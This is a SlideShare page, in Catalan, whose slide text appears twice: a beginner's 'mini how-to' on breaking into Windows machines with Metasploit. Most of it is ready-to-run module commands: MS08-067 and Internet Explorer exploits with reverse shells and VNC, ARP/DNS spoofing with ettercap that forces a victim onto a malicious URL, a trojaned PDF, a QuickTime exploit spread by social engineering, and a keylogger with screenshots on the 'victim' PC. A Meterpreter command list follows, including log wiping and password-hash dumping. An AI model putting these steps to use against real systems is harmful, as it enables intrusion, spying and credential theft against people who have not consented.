SlideShare ist ein Scribd-Unternehmen logo
1 von 8
Downloaden Sie, um offline zu lesen
Més manuals a: http://www.exabyteinformatica.com/manuales-y-apuntes-freeware
(C) Roger Casadejús Pérez | http://www.exabyteinformatica.com/tienda/
Metasploit Framework: Mini How-to
Aquest mini how-to us mostra amb exemples com s'utilitzarien alguns exploits de Metasploit
per explotar vulnerabilitats de Windows.
Potser us semblaran poca cosa ja que m'estic iniciant en això i vull que aquest post serveixi per
seguir aprenent d'aquest tema i aporteu els vostres coneixements.
Començar dient que Metasploit Framework es pot utilitzar tant en Linux com en Windows. Jo
utilitzo Backtrack ja que ho inclou, a més d'altres eines que poden combinar-se amb
Metasploit.
Link de descàrrega: http://www.metasploit.com/download/
Abans de llançar qualsevol exploit, és recomanable que coneguem les ip's connectades a la
nostra xarxa, per saber-ho fem:
Linux:
sudo nmap -sS -O 192.168.1.0-255
(Canvieu 192.168.1.0 per la vostra IP 0 de la vostra lan)
-sS --> Escanegem de forma silenciosa
-O --> Perquè ens mostri el Sistema Operatiu
Windows:
net view
A part d'això aconsello també l'ús de l'eina Colasoft MAC Scanner per l'escaneig de PC's
connectats a la xarxa.
Executem el msfconsole de Metasploit Framework.
Una vegada que coneixem les ip's i els seus respectius Sistemes Operatius, per utilitzar el
primer exploit anem a intentar localitzar algun Windows XP.
Més manuals a: http://www.exabyteinformatica.com/manuales-y-apuntes-freeware
(C) Roger Casadejús Pérez | http://www.exabyteinformatica.com/tienda/
(Recomanable que per veure si el pc està connectat fem ping a la seva IP).
Primer exploit (netapi)
use windows/smb/ms08_067_netapi
set RHOST (ip equip remot)
set payload windows/vncinject/reverse_tcp
set LHOST (ip del nostre equip)
exploit
Se'ns obrirà una pantalla remota amb el pc víctima.
Com hem vist anteriorment, només serveix per Windows XP, vegem ara un que es pot utilitzar
en qualsevol Sistema Windows aprofitant una vulnerabilitat en Internet Explorer (com és
natural, la víctima ha d'utilitzar com a navegador l'Internet Explorer).
Segon exploit
use exploit/windows/browser/ms10_022_ie_vbscript_winhlp32
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST (la nostra IP)
set LPORT 4442
exploit
Sortirà una URL en la qual la víctima ha d'entrar, esperem a que entri.
sessions -i 1
run vnc
Se'ns obrirà una pantalla remota amb el pc víctima.
Més manuals a: http://www.exabyteinformatica.com/manuales-y-apuntes-freeware
(C) Roger Casadejús Pérez | http://www.exabyteinformatica.com/tienda/
Tercer exploit (Semblat a l'anterior)
use exploit/windows/browser/ms11_003_ie_css_import
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST (la nostra IP)
exploit
Sortirà una URL en la qual la víctima ha d'entrar, esperem que entri.
sessions -i 1
run vnc
Se'ns obrirà una pantalla remota amb el pc víctima.
Suposem que no tenim possibilitat de passar-li la URL al pc víctima, per a això podem utilitzar:
ettercap de la següent manera:
ettercap -T -q -i eth0 -P dns_spoof -M arp:remote /(ip víctima)/ //
D'aquesta manera quan s'obri l'explorer anirà a aquesta URL directament. Per a això hem de
modificar abans l'arxiu etter.dns. Per a això procedim de la següent manera:
sudo gedit /usr/share/ettercap/etter.dns
Busquem la següent linea:
################################
#
# redirect it to www.linux.org
#
Més manuals a: http://www.exabyteinformatica.com/manuales-y-apuntes-freeware
(C) Roger Casadejús Pérez | http://www.exabyteinformatica.com/tienda/
I agreguem el següent:
* A la nostra_ip
El * perquè quan entri a qualsevol URL es redireccioni a la URL Infectada.
Cambra exploit (a través de pdf)
use exploit/windows/fileformat/adobe_pdf_embedded_exe
set FILENAME arxiu.pdf (arxiu que anem a crear, posem el nom que vulguem)
set INFILENAME arxiu.pdf (arxiu net, li passem el nom del nostre pdf)
set OUTPUTPATH /root/
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST (la nostra ip)
set LPORT 4455
set id 0
exploit
clear
back
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST (la nostra IP)
set LPORT 4455
set id 0
exploit
Li passem el pdf a la víctima i en obrir-lo ens donarà accés al seu PC.
Cinquè exploit (vulnerabilitat de Quicktime)
use exploit/windows/browser/apple_quicktime_marshaled_punk (Exploit que anem a utilitzar)
set SRVHOST 192.168.0.162 (IP local on va a muntar el servei)
Més manuals a: http://www.exabyteinformatica.com/manuales-y-apuntes-freeware
(C) Roger Casadejús Pérez | http://www.exabyteinformatica.com/tienda/
set SRVPORT 80 (Port local del servei)
set URIPATH jocs (Uri del servei)
set payload windows/shell/reverse_tcp (Payload que anem a utilitzar)
set LHOST 192.168.0.162 (IP on es connectarà la víctima)
set LPORT 5050 (Port local d'escolta)
exploit (Executem el exploit)
Només faltaria que la nostra víctima es connectés al nostre servidor (192.168.0.162/jocs),
aconseguint això usant una mica d'enginyeria social, perquè Metasploit ens informi que s'ha
creat una nova sessió. Usem el següent comandament (sessions -i x) on x és el nombre de
sessió creat per connectar amb la víctima i se'ns retorni una shell reverse de la mateixa.
D'aquesta manera aconseguirem control total sobre el seu PC. Aquest mètode serveix per a
totes les versions de Windows que tinguin instal·lat Quicktime.
Sisè exploit (keylogger)
use windows/smb/ms08_067_netapi
set RHOST (ip equip remot)
set PAYLOAD windows/meterpreter/bind_tcp
exploit
Una vegada llançat el exploit ja estarem dins del PC víctima, vegem els processos que té
corrent:
ps
Ara migrarem el processo explorer.exe. Usant el comando següent:
migrate (nº del procés).
Iniciem el Keylogger
keyscan_start
Més manuals a: http://www.exabyteinformatica.com/manuales-y-apuntes-freeware
(C) Roger Casadejús Pérez | http://www.exabyteinformatica.com/tienda/
Amb l'ajuda del comandament keyscan_dump, veurem les tecles pressionades en l'equip
víctima.
keyscan_dump
També tenim la possibilitat de veure un ScreenShot de la pantalla víctima.
use espia
screenshot /Imag.bmp
Finalitzem el keylogger:
keyscan_stop
Setè exploit (Intrusió en Windows Server 2000)
search exploit ms03_026_dcom
use exploit /windows/dcerpc/ms03_026_dcom
show targets
show payloads
set payload generic/shell_bind_tcp
show options
set RHOST [IP de la víctima]
exploit
Una vegada explotat el sistema podem fer moltes coses, heus aquí un llistat de comandos que
podem utilitzar:
background -> Envia al segon pla la sesion activa.
exit -> Acaba la sessió oberta de Meterpreter.
help -> Mostra l'ajuda
Més manuals a: http://www.exabyteinformatica.com/manuales-y-apuntes-freeware
(C) Roger Casadejús Pérez | http://www.exabyteinformatica.com/tienda/
irb -> Ens llança a l'intèrpret de Ruby (irb).
migrate -> Migra d'un procés a un altre.
quit -> Acaba la sessió oberta de Meterpreter.
run -> Executa un script de Meterpreter. Pressionant dues vegades TAB veurem els
disponibles.
use -> Carrega una o mes extensions de Meterpreter. Pressionant dues vegades TAB veurem
els disponibles.
cat -> Mostra el contingut d'un arxiu de text.
cd -> Canvia a un directori.
del -> Elimina un arxiu específic.
download -> Descarrega un arxiu o directori a l'equip local.
editc -> Edita un arxiu.
getlwd -> Mostra el directori local en el qual estem treballant.
getwd -> Mostra el directori remot en el qual estem treballant.
lcd -> Canvia a un directori local.
lpwd -> Mostra el directori local en el qual estem treballant.
ls -> Mostra els arxius continguts en un directori.
mkdir -> Crea un directori.
pwd -> Mostra el directori remot en el qual estem treballant.
rm -> Elimina un arxiu específic.
rmdir -> Elimina un directori específic.
upload -> Puja un arxiu o directori a l'equip remot.
ipconfig -> Mostra les interfícies de xarxa.
clearev -> Elimina els logs emmagatzemats en l'aplicació “Visor de Successos”
execute -> Executa un comandament.
getpid -> Mostra la identificació del procés en el qual estem.
getuid -> Mostra l'usuari en el qual estem actualment .
kill -> Acaba un procés.
Més manuals a: http://www.exabyteinformatica.com/manuales-y-apuntes-freeware
(C) Roger Casadejús Pérez | http://www.exabyteinformatica.com/tienda/
ps -> Mostra els processos en execució.
reboot -> Reinicia l'equip remot.
reg -> Modifica i interactua amb el registre remot.
shell -> Ens llança a una consola en l'equip remot.
shutdown -> Apaga l'equip remot.
sysinfo -> Ens mostra informació sobre l'equip remot.
keyscan_dump -> Mostra les pulsacions de tecles gravades.
keyscan_start -> Comença a capturar pulsacions de tecles.
keyscan_stop -> Atura la captura de pulsacions de tecles.
hashdump -> Mostra el contingut de la base de dades SAM de Windows (Conté els usuaris i
passwords encriptades).
De tant en tant reviso aquesta pàgina per aprendre una mica més sobre aquest ampli tema.
Us la recomano http://www.metasploit.com/modules/

Weitere ähnliche Inhalte

Was ist angesagt?

Tutorial instal·lació OpenKM
Tutorial instal·lació OpenKMTutorial instal·lació OpenKM
Tutorial instal·lació OpenKMjonatangm1
 
Control remot amb Telnet i SSH
Control remot amb Telnet i SSHControl remot amb Telnet i SSH
Control remot amb Telnet i SSHYeni ChT
 
Instal·lació i preparació de la màquina virtual: virtualbox
Instal·lació i preparació  de la màquina virtual: virtualboxInstal·lació i preparació  de la màquina virtual: virtualbox
Instal·lació i preparació de la màquina virtual: virtualboxAvel·lí
 
Tutorial instal·lació OpenKm en una maquina Debian
Tutorial instal·lació OpenKm en una maquina DebianTutorial instal·lació OpenKm en una maquina Debian
Tutorial instal·lació OpenKm en una maquina Debianmusta99
 
Creacio de la maquina virtual. Instal.lació de Windows'XP
Creacio de la maquina virtual. Instal.lació de Windows'XPCreacio de la maquina virtual. Instal.lació de Windows'XP
Creacio de la maquina virtual. Instal.lació de Windows'XPHerminio Manzano Bojadós
 

Was ist angesagt? (6)

Tutorial instal·lació OpenKM
Tutorial instal·lació OpenKMTutorial instal·lació OpenKM
Tutorial instal·lació OpenKM
 
P2 - OpenKM
P2 - OpenKMP2 - OpenKM
P2 - OpenKM
 
Control remot amb Telnet i SSH
Control remot amb Telnet i SSHControl remot amb Telnet i SSH
Control remot amb Telnet i SSH
 
Instal·lació i preparació de la màquina virtual: virtualbox
Instal·lació i preparació  de la màquina virtual: virtualboxInstal·lació i preparació  de la màquina virtual: virtualbox
Instal·lació i preparació de la màquina virtual: virtualbox
 
Tutorial instal·lació OpenKm en una maquina Debian
Tutorial instal·lació OpenKm en una maquina DebianTutorial instal·lació OpenKm en una maquina Debian
Tutorial instal·lació OpenKm en una maquina Debian
 
Creacio de la maquina virtual. Instal.lació de Windows'XP
Creacio de la maquina virtual. Instal.lació de Windows'XPCreacio de la maquina virtual. Instal.lació de Windows'XP
Creacio de la maquina virtual. Instal.lació de Windows'XP
 

Andere mochten auch (9)

Presentació de Windows 7
Presentació de Windows 7Presentació de Windows 7
Presentació de Windows 7
 
Presentació de l'iPad mini
Presentació de l'iPad miniPresentació de l'iPad mini
Presentació de l'iPad mini
 
Migració de Windows a GNU Linux Ubuntu
Migració de Windows a GNU Linux UbuntuMigració de Windows a GNU Linux Ubuntu
Migració de Windows a GNU Linux Ubuntu
 
Presentació de Magento
Presentació de MagentoPresentació de Magento
Presentació de Magento
 
Presentació d'Owncloud
Presentació d'OwncloudPresentació d'Owncloud
Presentació d'Owncloud
 
Manual de la zona d'administració de Zen cart
Manual de la zona d'administració de Zen cartManual de la zona d'administració de Zen cart
Manual de la zona d'administració de Zen cart
 
Presentació de Playstation 3
Presentació de Playstation 3Presentació de Playstation 3
Presentació de Playstation 3
 
Presentació de l'iPhone 3gs
Presentació de l'iPhone 3gsPresentació de l'iPhone 3gs
Presentació de l'iPhone 3gs
 
Presentació de la gestió documental
Presentació de la gestió documentalPresentació de la gestió documental
Presentació de la gestió documental
 

Ähnlich wie Metasploit framework mini how-to

Practica 2-instal-lar-open km-en-una-maquina-virtual-debian-george
Practica 2-instal-lar-open km-en-una-maquina-virtual-debian-georgePractica 2-instal-lar-open km-en-una-maquina-virtual-debian-george
Practica 2-instal-lar-open km-en-una-maquina-virtual-debian-georgeGeorgeTalmaciuValent
 
Gestor incidencias OCS
Gestor incidencias OCSGestor incidencias OCS
Gestor incidencias OCSkingofbike
 
Pujante aaron 01_gestorincidenciesocs
Pujante aaron 01_gestorincidenciesocsPujante aaron 01_gestorincidenciesocs
Pujante aaron 01_gestorincidenciesocsAaron Pujante
 
Repositori local de paquets de ubuntu 10.04
Repositori local de paquets de ubuntu 10.04Repositori local de paquets de ubuntu 10.04
Repositori local de paquets de ubuntu 10.04Avel·lí
 
Maquinas Virtuales con Virtualbox
Maquinas Virtuales con VirtualboxMaquinas Virtuales con Virtualbox
Maquinas Virtuales con VirtualboxHéctor Soriano
 
Apunts de Windows XP
Apunts de Windows XPApunts de Windows XP
Apunts de Windows XPRaulgracia
 
Sistemes operatius; apunts
Sistemes operatius; apuntsSistemes operatius; apunts
Sistemes operatius; apuntsMelanie Nogué
 
MorilloLaura_P01_gestorincidenciesocs
MorilloLaura_P01_gestorincidenciesocsMorilloLaura_P01_gestorincidenciesocs
MorilloLaura_P01_gestorincidenciesocslauramorillosegarra
 
Executar scripts d'inici i crear un altre usuari amb AirOs d'Ubiquiti
Executar scripts d'inici i crear un altre usuari amb AirOs d'UbiquitiExecutar scripts d'inici i crear un altre usuari amb AirOs d'Ubiquiti
Executar scripts d'inici i crear un altre usuari amb AirOs d'UbiquitiJordi Clopés Esteban
 
Duplicity
DuplicityDuplicity
Duplicitycfgmi
 
Virtualbox (1).pdf
Virtualbox (1).pdfVirtualbox (1).pdf
Virtualbox (1).pdfjordi451374
 
edwarner glpi
edwarner glpiedwarner glpi
edwarner glpied_warner
 
Pulido alex 01gestorincidenciesocs
Pulido alex 01gestorincidenciesocsPulido alex 01gestorincidenciesocs
Pulido alex 01gestorincidenciesocsalex pulido
 

Ähnlich wie Metasploit framework mini how-to (20)

Practica 2-instal-lar-open km-en-una-maquina-virtual-debian-george
Practica 2-instal-lar-open km-en-una-maquina-virtual-debian-georgePractica 2-instal-lar-open km-en-una-maquina-virtual-debian-george
Practica 2-instal-lar-open km-en-una-maquina-virtual-debian-george
 
Gestor incidencias OCS
Gestor incidencias OCSGestor incidencias OCS
Gestor incidencias OCS
 
Pujante aaron 01_gestorincidenciesocs
Pujante aaron 01_gestorincidenciesocsPujante aaron 01_gestorincidenciesocs
Pujante aaron 01_gestorincidenciesocs
 
GLPI
GLPIGLPI
GLPI
 
Repositori local de paquets de ubuntu 10.04
Repositori local de paquets de ubuntu 10.04Repositori local de paquets de ubuntu 10.04
Repositori local de paquets de ubuntu 10.04
 
Maquinas Virtuales con Virtualbox
Maquinas Virtuales con VirtualboxMaquinas Virtuales con Virtualbox
Maquinas Virtuales con Virtualbox
 
Garcia xavi 01gestorincidenciesocs
Garcia xavi 01gestorincidenciesocsGarcia xavi 01gestorincidenciesocs
Garcia xavi 01gestorincidenciesocs
 
Apunts de Windows XP
Apunts de Windows XPApunts de Windows XP
Apunts de Windows XP
 
Sistemes operatius; apunts
Sistemes operatius; apuntsSistemes operatius; apunts
Sistemes operatius; apunts
 
Taller Colinux
Taller ColinuxTaller Colinux
Taller Colinux
 
Tema1
Tema1Tema1
Tema1
 
Presentació de Samba
Presentació de SambaPresentació de Samba
Presentació de Samba
 
glpi + ocs_inventory
glpi + ocs_inventoryglpi + ocs_inventory
glpi + ocs_inventory
 
GLPI + OCS Inventory
GLPI + OCS InventoryGLPI + OCS Inventory
GLPI + OCS Inventory
 
MorilloLaura_P01_gestorincidenciesocs
MorilloLaura_P01_gestorincidenciesocsMorilloLaura_P01_gestorincidenciesocs
MorilloLaura_P01_gestorincidenciesocs
 
Executar scripts d'inici i crear un altre usuari amb AirOs d'Ubiquiti
Executar scripts d'inici i crear un altre usuari amb AirOs d'UbiquitiExecutar scripts d'inici i crear un altre usuari amb AirOs d'Ubiquiti
Executar scripts d'inici i crear un altre usuari amb AirOs d'Ubiquiti
 
Duplicity
DuplicityDuplicity
Duplicity
 
Virtualbox (1).pdf
Virtualbox (1).pdfVirtualbox (1).pdf
Virtualbox (1).pdf
 
edwarner glpi
edwarner glpiedwarner glpi
edwarner glpi
 
Pulido alex 01gestorincidenciesocs
Pulido alex 01gestorincidenciesocsPulido alex 01gestorincidenciesocs
Pulido alex 01gestorincidenciesocs
 

Mehr von Roger Casadejús Pérez

Presentació de Wordpress fins a la 3.5.1
Presentació de Wordpress fins a la 3.5.1Presentació de Wordpress fins a la 3.5.1
Presentació de Wordpress fins a la 3.5.1Roger Casadejús Pérez
 
Presentació de les novetats i llicències Vmware esxi 5
Presentació de les novetats i llicències Vmware esxi 5Presentació de les novetats i llicències Vmware esxi 5
Presentació de les novetats i llicències Vmware esxi 5Roger Casadejús Pérez
 

Mehr von Roger Casadejús Pérez (20)

Presentació de Wordpress fins a la 3.5.1
Presentació de Wordpress fins a la 3.5.1Presentació de Wordpress fins a la 3.5.1
Presentació de Wordpress fins a la 3.5.1
 
Presentació de Facebook
Presentació de FacebookPresentació de Facebook
Presentació de Facebook
 
Presentació de Twitter
Presentació de TwitterPresentació de Twitter
Presentació de Twitter
 
Presentació del protocol TCP/IP
Presentació del protocol TCP/IPPresentació del protocol TCP/IP
Presentació del protocol TCP/IP
 
Presentació de la història de Google
Presentació de la història de GooglePresentació de la història de Google
Presentació de la història de Google
 
Presentació de les novetats i llicències Vmware esxi 5
Presentació de les novetats i llicències Vmware esxi 5Presentació de les novetats i llicències Vmware esxi 5
Presentació de les novetats i llicències Vmware esxi 5
 
Presentació de Virtual box
Presentació de Virtual boxPresentació de Virtual box
Presentació de Virtual box
 
Presentació històrica del VHS
Presentació històrica del VHSPresentació històrica del VHS
Presentació històrica del VHS
 
Ps3 slim al descobert
Ps3 slim al descobertPs3 slim al descobert
Ps3 slim al descobert
 
Què és W3C?
Què és W3C?Què és W3C?
Què és W3C?
 
Sitemap.xml i robots.txt
Sitemap.xml i robots.txtSitemap.xml i robots.txt
Sitemap.xml i robots.txt
 
Seo: Com triomfar en els buscadors?
Seo: Com triomfar en els buscadors?Seo: Com triomfar en els buscadors?
Seo: Com triomfar en els buscadors?
 
Dues tecniques SEO de programació web
Dues tecniques SEO de programació webDues tecniques SEO de programació web
Dues tecniques SEO de programació web
 
Què és i com funciona el pagerank?
Què és i com funciona el pagerank?Què és i com funciona el pagerank?
Què és i com funciona el pagerank?
 
Url amigables
Url amigablesUrl amigables
Url amigables
 
Zona DMZ
Zona DMZZona DMZ
Zona DMZ
 
Presentació de spoofing
Presentació de spoofingPresentació de spoofing
Presentació de spoofing
 
IP brick
IP brickIP brick
IP brick
 
Presentació de Smoothwall
Presentació de SmoothwallPresentació de Smoothwall
Presentació de Smoothwall
 
Presentació històrica de Visual.NET
Presentació històrica de Visual.NETPresentació històrica de Visual.NET
Presentació històrica de Visual.NET
 

Metasploit framework mini how-to

  • 1. Més manuals a: http://www.exabyteinformatica.com/manuales-y-apuntes-freeware (C) Roger Casadejús Pérez | http://www.exabyteinformatica.com/tienda/ Metasploit Framework: Mini How-to Aquest mini how-to us mostra amb exemples com s'utilitzarien alguns exploits de Metasploit per explotar vulnerabilitats de Windows. Potser us semblaran poca cosa ja que m'estic iniciant en això i vull que aquest post serveixi per seguir aprenent d'aquest tema i aporteu els vostres coneixements. Començar dient que Metasploit Framework es pot utilitzar tant en Linux com en Windows. Jo utilitzo Backtrack ja que ho inclou, a més d'altres eines que poden combinar-se amb Metasploit. Link de descàrrega: http://www.metasploit.com/download/ Abans de llançar qualsevol exploit, és recomanable que coneguem les ip's connectades a la nostra xarxa, per saber-ho fem: Linux: sudo nmap -sS -O 192.168.1.0-255 (Canvieu 192.168.1.0 per la vostra IP 0 de la vostra lan) -sS --> Escanegem de forma silenciosa -O --> Perquè ens mostri el Sistema Operatiu Windows: net view A part d'això aconsello també l'ús de l'eina Colasoft MAC Scanner per l'escaneig de PC's connectats a la xarxa. Executem el msfconsole de Metasploit Framework. Una vegada que coneixem les ip's i els seus respectius Sistemes Operatius, per utilitzar el primer exploit anem a intentar localitzar algun Windows XP.
  • 2. Més manuals a: http://www.exabyteinformatica.com/manuales-y-apuntes-freeware (C) Roger Casadejús Pérez | http://www.exabyteinformatica.com/tienda/ (Recomanable que per veure si el pc està connectat fem ping a la seva IP). Primer exploit (netapi) use windows/smb/ms08_067_netapi set RHOST (ip equip remot) set payload windows/vncinject/reverse_tcp set LHOST (ip del nostre equip) exploit Se'ns obrirà una pantalla remota amb el pc víctima. Com hem vist anteriorment, només serveix per Windows XP, vegem ara un que es pot utilitzar en qualsevol Sistema Windows aprofitant una vulnerabilitat en Internet Explorer (com és natural, la víctima ha d'utilitzar com a navegador l'Internet Explorer). Segon exploit use exploit/windows/browser/ms10_022_ie_vbscript_winhlp32 set PAYLOAD windows/meterpreter/reverse_tcp set LHOST (la nostra IP) set LPORT 4442 exploit Sortirà una URL en la qual la víctima ha d'entrar, esperem a que entri. sessions -i 1 run vnc Se'ns obrirà una pantalla remota amb el pc víctima.
  • 3. Més manuals a: http://www.exabyteinformatica.com/manuales-y-apuntes-freeware (C) Roger Casadejús Pérez | http://www.exabyteinformatica.com/tienda/ Tercer exploit (Semblat a l'anterior) use exploit/windows/browser/ms11_003_ie_css_import set PAYLOAD windows/meterpreter/reverse_tcp set LHOST (la nostra IP) exploit Sortirà una URL en la qual la víctima ha d'entrar, esperem que entri. sessions -i 1 run vnc Se'ns obrirà una pantalla remota amb el pc víctima. Suposem que no tenim possibilitat de passar-li la URL al pc víctima, per a això podem utilitzar: ettercap de la següent manera: ettercap -T -q -i eth0 -P dns_spoof -M arp:remote /(ip víctima)/ // D'aquesta manera quan s'obri l'explorer anirà a aquesta URL directament. Per a això hem de modificar abans l'arxiu etter.dns. Per a això procedim de la següent manera: sudo gedit /usr/share/ettercap/etter.dns Busquem la següent linea: ################################ # # redirect it to www.linux.org #
  • 4. Més manuals a: http://www.exabyteinformatica.com/manuales-y-apuntes-freeware (C) Roger Casadejús Pérez | http://www.exabyteinformatica.com/tienda/ I agreguem el següent: * A la nostra_ip El * perquè quan entri a qualsevol URL es redireccioni a la URL Infectada. Cambra exploit (a través de pdf) use exploit/windows/fileformat/adobe_pdf_embedded_exe set FILENAME arxiu.pdf (arxiu que anem a crear, posem el nom que vulguem) set INFILENAME arxiu.pdf (arxiu net, li passem el nom del nostre pdf) set OUTPUTPATH /root/ set PAYLOAD windows/meterpreter/reverse_tcp set LHOST (la nostra ip) set LPORT 4455 set id 0 exploit clear back use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LHOST (la nostra IP) set LPORT 4455 set id 0 exploit Li passem el pdf a la víctima i en obrir-lo ens donarà accés al seu PC. Cinquè exploit (vulnerabilitat de Quicktime) use exploit/windows/browser/apple_quicktime_marshaled_punk (Exploit que anem a utilitzar) set SRVHOST 192.168.0.162 (IP local on va a muntar el servei)
  • 5. Més manuals a: http://www.exabyteinformatica.com/manuales-y-apuntes-freeware (C) Roger Casadejús Pérez | http://www.exabyteinformatica.com/tienda/ set SRVPORT 80 (Port local del servei) set URIPATH jocs (Uri del servei) set payload windows/shell/reverse_tcp (Payload que anem a utilitzar) set LHOST 192.168.0.162 (IP on es connectarà la víctima) set LPORT 5050 (Port local d'escolta) exploit (Executem el exploit) Només faltaria que la nostra víctima es connectés al nostre servidor (192.168.0.162/jocs), aconseguint això usant una mica d'enginyeria social, perquè Metasploit ens informi que s'ha creat una nova sessió. Usem el següent comandament (sessions -i x) on x és el nombre de sessió creat per connectar amb la víctima i se'ns retorni una shell reverse de la mateixa. D'aquesta manera aconseguirem control total sobre el seu PC. Aquest mètode serveix per a totes les versions de Windows que tinguin instal·lat Quicktime. Sisè exploit (keylogger) use windows/smb/ms08_067_netapi set RHOST (ip equip remot) set PAYLOAD windows/meterpreter/bind_tcp exploit Una vegada llançat el exploit ja estarem dins del PC víctima, vegem els processos que té corrent: ps Ara migrarem el processo explorer.exe. Usant el comando següent: migrate (nº del procés). Iniciem el Keylogger keyscan_start
  • 6. Més manuals a: http://www.exabyteinformatica.com/manuales-y-apuntes-freeware (C) Roger Casadejús Pérez | http://www.exabyteinformatica.com/tienda/ Amb l'ajuda del comandament keyscan_dump, veurem les tecles pressionades en l'equip víctima. keyscan_dump També tenim la possibilitat de veure un ScreenShot de la pantalla víctima. use espia screenshot /Imag.bmp Finalitzem el keylogger: keyscan_stop Setè exploit (Intrusió en Windows Server 2000) search exploit ms03_026_dcom use exploit /windows/dcerpc/ms03_026_dcom show targets show payloads set payload generic/shell_bind_tcp show options set RHOST [IP de la víctima] exploit Una vegada explotat el sistema podem fer moltes coses, heus aquí un llistat de comandos que podem utilitzar: background -> Envia al segon pla la sesion activa. exit -> Acaba la sessió oberta de Meterpreter. help -> Mostra l'ajuda
  • 7. Més manuals a: http://www.exabyteinformatica.com/manuales-y-apuntes-freeware (C) Roger Casadejús Pérez | http://www.exabyteinformatica.com/tienda/ irb -> Ens llança a l'intèrpret de Ruby (irb). migrate -> Migra d'un procés a un altre. quit -> Acaba la sessió oberta de Meterpreter. run -> Executa un script de Meterpreter. Pressionant dues vegades TAB veurem els disponibles. use -> Carrega una o mes extensions de Meterpreter. Pressionant dues vegades TAB veurem els disponibles. cat -> Mostra el contingut d'un arxiu de text. cd -> Canvia a un directori. del -> Elimina un arxiu específic. download -> Descarrega un arxiu o directori a l'equip local. editc -> Edita un arxiu. getlwd -> Mostra el directori local en el qual estem treballant. getwd -> Mostra el directori remot en el qual estem treballant. lcd -> Canvia a un directori local. lpwd -> Mostra el directori local en el qual estem treballant. ls -> Mostra els arxius continguts en un directori. mkdir -> Crea un directori. pwd -> Mostra el directori remot en el qual estem treballant. rm -> Elimina un arxiu específic. rmdir -> Elimina un directori específic. upload -> Puja un arxiu o directori a l'equip remot. ipconfig -> Mostra les interfícies de xarxa. clearev -> Elimina els logs emmagatzemats en l'aplicació “Visor de Successos” execute -> Executa un comandament. getpid -> Mostra la identificació del procés en el qual estem. getuid -> Mostra l'usuari en el qual estem actualment . kill -> Acaba un procés.
  • 8. Més manuals a: http://www.exabyteinformatica.com/manuales-y-apuntes-freeware (C) Roger Casadejús Pérez | http://www.exabyteinformatica.com/tienda/ ps -> Mostra els processos en execució. reboot -> Reinicia l'equip remot. reg -> Modifica i interactua amb el registre remot. shell -> Ens llança a una consola en l'equip remot. shutdown -> Apaga l'equip remot. sysinfo -> Ens mostra informació sobre l'equip remot. keyscan_dump -> Mostra les pulsacions de tecles gravades. keyscan_start -> Comença a capturar pulsacions de tecles. keyscan_stop -> Atura la captura de pulsacions de tecles. hashdump -> Mostra el contingut de la base de dades SAM de Windows (Conté els usuaris i passwords encriptades). De tant en tant reviso aquesta pàgina per aprendre una mica més sobre aquest ampli tema. Us la recomano http://www.metasploit.com/modules/